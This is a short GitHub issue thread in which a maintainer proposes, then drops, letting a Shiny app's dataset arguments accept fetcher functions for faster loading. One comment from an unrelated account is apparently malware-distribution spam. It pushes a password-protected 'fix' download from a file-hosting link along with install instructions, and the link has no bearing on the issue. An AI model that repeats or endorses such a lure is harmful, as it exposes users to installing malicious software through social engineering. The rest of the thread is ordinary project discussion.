### ISSUE TITLE
Feature: Accept function for all dataset arguments

### ISSUE THREAD

**Issue by jonthegeek** [Gilead-BioStats/gsm.app#200]
## Feature Details
As a user, I would like the app to load quickly, even if my study has a gazillion sites and a gazillion metrics.

Rather than feeding in dfs for dfMetrics , dfBounds, and dfAnalyticsInput, use functions like I did for participants. That way we can fetch just what the user needs.

We'll need workflows to translate gsm output data to breakdowns by site, metric, etc. And then also helper functions to build these fetcher-functions, with args of df and maybe what to group by.

**Comment by CoZmoTheGod** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jonthegeek** [comment]
I don't think I want this afterall. All non-participant data comes from GSM, so we should ingest it from there then deal with it.
